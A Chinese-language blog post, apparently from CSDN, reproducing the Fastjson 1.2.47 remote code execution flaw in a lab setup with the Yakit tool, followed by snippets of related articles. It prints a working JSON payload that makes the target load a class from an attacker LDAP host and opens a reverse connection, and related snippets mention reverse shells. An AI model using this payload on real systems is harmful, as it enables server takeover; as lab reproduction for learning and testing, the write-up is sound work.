fastjson_1.2.47rce漏洞复现

最新推荐文章于 2025-04-14 21:34:27 发布
最新推荐文章于 2025-04-14 21:34:27 发布
阅读量2.3k 收藏 43
点赞数 39
分类专栏: 漏洞复现 文章标签: 安全 网络 java json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_71090536/article/details/135776113
版权
本文介绍了在Kali与win10环境中使用Yakit渗透测试工具,特别是针对Fastjson的高危漏洞进行交互式劫持和远程代码执行(RCE)的实战步骤,包括漏洞验证、数据包分析和复现方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境及工具

测试环境机:Kali:192.168.2.235

                     win10:192.168.2.215

使用工具 Yakit

Yakit 主要功能:

渗透测试工具:交互式劫持、Web Fuzzer、弱口令检测

弱口令可对常见服务端口/IP 进行爆破

漏洞检测:专项漏洞检测,批量执行

资产搜集:端口 / 指纹扫描:域名 / IP 地址,数据库 / 服务器

小工具:Codec、数据对比、Payload

查看所有劫持到的请求的历史记录以及分析请求的参数

全球第一个可视化的 Web模糊测试工具:Web Fuzzer

第三方 Yak 模块商店:社区主导的第三方 Yak 模块插件

漏洞描述

Fastjson是一个 Java 语言编写的高性能 JSON 解析器和生成器,fastjson autotype 在处理 json 对象的时候,未对 auto type 字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi 主机,通过其中的恶意类执行代码

漏洞等级

高危

漏洞验证

1. 启动测试环境

sudo docker-compose up -d

访问测试 IP 及端口

2. 打开 Yakit 交互劫持,进行抓包

设置监听主机 IP 和监听端口,并启用fastjson插件进行利用,之后点击“劫持启动”进行抓包

浏览器端挂上 Yakit 代理,即可在劫持中抓到数据包

3. 由图可知,抓取到了数据包,并且插件识别到了 fastjson远程命令执行的漏洞

查看该详细信息,将其请求数据包发送至重放模块(“ctrl”+“R”),进行更改数据包重放

4. 查看数据包,可以发现 Request 包中的请求内容采用了 Unicode 编码形式,故需对此数据进行解码

右键解码

将解码后的内容进行替换

5. 可先利用 Dnslog 平台进行漏洞验证

将其自动生成的可用域名复制

6. 将生成的可用域名替换到下图标记处,发送请求

可观察到 Dnslog 平台有记录生成,表名此处存在 fastjson 漏洞

漏洞复现

1. 接下来,我们利用 Yakit 的监听功能进行 rce 复现

设置监听 IP 和监听端口,此处为本机IP

2. 设置反连服务器,反连地址是本机 IP,设置反连端口,启动

3. 启动成功后,设置payload,选择恶意类,设置反连主机和反连端口,回弹到 6666 端口,因为在 6666 端口进行主机监听

在此使用到 github 中的 poc(poc可自行在github中进行搜索)

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://10.30.1.214:1389/my9azs",
        "autoCommit":true
    }
}

将此 poc 复制到请求数据包中

4. 将 rmi 反连地址 + 恶意类名,复制到请求数据包中的 poc 中,此处也可利用 LDAP等,进行多角度尝试

复制至此,发送数据包

发送数据包后,查看端口监听器,监听成功,可输入命令 “id” 查看权限,即可执行 rce

Fastjson RCE漏洞利用与防护手段
不忘初心,护天下安全!
07-12 777
Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSONJava Object之间互相转换,提供两个主要接口JSON.toJSONString和JSON.parseObject/JSON.parse来分别实现序列化和反序列化操作。项目地址:https://link.zhihu.com/?target=https%3A//github.com/alibaba/fastjson随着该框架的使用,安全人员发现了一系列反序列化漏洞,每一次都是IT界的“地震”。漏洞合集见:Fa
Fastjson 1.2.47 RCE漏洞复现
wutiangui的博客
11-07 493
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
CVE重要漏洞复现-Fastjson1.2.24-RCE漏洞
最新发布
zj2084的博客
04-14 862
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
FastjsonRCE1.2.47漏洞复现
02-24 2462
Fastjson漏洞原理和RCE1.2.47漏洞复现
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 934
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
漏洞复现 Fastjson 1.2.47-rce
Lucky1youzi的博客
01-05 1094
用burp得扩展插件FastjsonScan来进行检测,将拦截得包右击鼠标发送Extensions/FastjsonScan ,如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。构造反弹shell,进行base64编码,推荐在线工具,可以快速做bash反弹shell命令。
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3561
Fastjson 1.2.47反序列化漏洞复现
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1421
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
Fastjson1.2.47 RCE
limb0的博客
06-14 1028
Fastjson1.2.47 RCE 一、漏洞介绍 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列
vulhub复现fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 3239
目录什么是jsonfastjson有啥用?什么是fastjsonjson语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
fastjson-1.2.47
12-07
fastjson-1.2.34
fastjson-1.2.47.jar
03-16
fastjson-1.2.47.jar,用于将java转换成json**********
fastjson最新版本库1.2.47
12-25
fastjon最新版本库1.2.47,分享资源,一起学习。
fastjson-1.2.47-API文档-中文版.zip
04-08
赠送jar包:fastjson-1.2.47.jar; 赠送原API文档:fastjson-1.2.47-javadoc.jar; 赠送源代码:fastjson-1.2.47-sources.jar; 包含翻译后的API文档:fastjson-1.2.47-javadoc-API文档-中文(简体)版.zip 对应Maven信息:groupId:com.alibaba,artifactId:fastjson,version:1.2.47 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
fastjson1.2.47以下 RCE 漏洞复现
问题很多的小明
09-21 1377
author:test Ox01 具体环境 War包部署在tomcat,war包使用fastjson解析 tomcat版本 java版本 0x02 尝试是否可以接受请求(也可以没有这一步) 先尝试是否可以收到ldap请求 post数据包如下: POST /fastjson/ HTTP/1.1 Host: x.x.x.x:8080 Cache-Control: max-age=0 Upgrade...
漏洞库】Fastjson_1.2.47_rce
yuan_boss的博客
09-08 1370
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
Fastjson1.2.47反序列化漏洞复现
Litbai_zhang
07-10 897
实验环境 攻击机C:Windows 10 企业版 LTSC 靶机A:CentOS8 (公网) 监听主机B:Centos7(公网) 项目地址: https://github.com/vulhub/vulhub 该篇复现环境是fastjson1.2.47复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装docker curl https://download.docker.com/linux/centos/docker...
fastjson_1.2.47 反序列化漏洞复现
acdcccc的博客
09-19 346
fastjson 1.2.47 反序列化漏洞复现
Fastjson1.2.47版本安全漏洞及修补建议
对于Fastjson来说,如果存在已知的安全漏洞,那么在Fastjson1.2.47以及之前版本中可能还没有被修复。这些漏洞可能涉及到远程代码执行、拒绝服务攻击(DoS)等多种安全威胁。开发者在使用这些版本时应谨慎,并考虑...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值